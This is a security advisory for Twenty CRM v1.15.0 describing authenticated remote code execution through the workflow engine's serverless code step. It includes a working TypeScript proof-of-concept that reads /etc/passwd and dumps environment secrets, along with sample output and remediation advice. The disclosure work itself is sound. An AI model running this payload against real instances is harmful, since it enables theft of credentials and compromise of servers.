Twenty CRM - Authenticated Remote Code Execution (RCE)

Overview

Product: Twenty CRM

Vulnerability: Remote Code Execution (RCE) via Serverless Workflow Functions

Severity: Critical

Affected Component: Workflow Automation (Code - Serverless Function)

Tested Version: v1.15.0

This repository documents a critical vulnerability in the Twenty CRM workflow engine. The "Code - Serverless Function" component allows authenticated users to execute arbitrary Node.js code. Due to a lack of sandboxing, it is possible to import the child_process module and execute system-level commands on the host server.

Vulnerability Details

The application allows users to create custom automation workflows that include a code execution step. While this is intended for data manipulation, the execution environment does not properly restrict access to Node.js built-in modules or the underlying operating system.

An attacker can utilize execSync from the child_process library to:

1. Execute shell commands (e.g., cat, ls, whoami).
2. Read sensitive files from the file system (e.g., /etc/passwd).
3. Dump environment variables (process.env), revealing database credentials, API keys, and application secrets.

Proof of Concept (PoC)

Steps to Reproduce

1. Log in to Twenty CRM.
2. Navigate to Settings > Workflows.
3. Create a new Workflow with a Manual Trigger.
4. Add an action: Code - Serverless Function.
5. Paste the following TypeScript payload into the code editor:

import { execSync } from 'child_process';

export const main = async (params: any): Promise<object> => {
  try {
    // 1. Remote Command Execution: Read system users
    const output = execSync('cat /etc/passwd').toString();
    
    // 2. Information Disclosure: Dump all environment variables (Secrets)
    const secrets = JSON.stringify(process.env);
    
    return { 
      data: output, 
      secrets: secrets 
    };
  } catch (e: any) {
    return { error: e.message };
  }
};

6. Save and Run the workflow.

Observed Output

The workflow executes successfully and returns the system data.

System File Access (/etc/passwd):

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
postgres:x:70:70:PostgreSQL user:/var/lib/postgresql:/bin/sh
...

Environment Variables Leaked: The process.env dump revealed critical configuration details:

• PG_DATABASE_URL (Database Credentials)
• APP_SECRET (Signing keys)
• REDIS_URL
• AWS_ACCESS_KEY (If configured)

Impact

This vulnerability allows an authenticated user (with permissions to create workflows) to achieve Full System Compromise.

• Confidentiality: Attackers can read all data in the database and file system.
• Integrity: Attackers can modify application code, delete data, or inject malware.
• Availability: Attackers can shut down the server or consume all resources.

Remediation

To fix this issue, the "Serverless Function" feature requires proper isolation.

• Implement Sandboxing: Code should be executed in a restricted environment (e.g., a VM2 sandbox, a dedicated Docker container with no network/volume access, or a micro-VM like Firecracker).
• Restrict Modules: Disable access to sensitive Node.js modules such as child_process, fs, and net.
• Environment Variable Scrubbing: Ensure the execution context does not inherit the parent process's environment variables (which contain the app's secrets).

Timeline

• Jan 8, 2026: Vulnerability discovered.
• [Date]: Reported to Twenty CRM Security Team.
• [Status]: Awaiting Patch.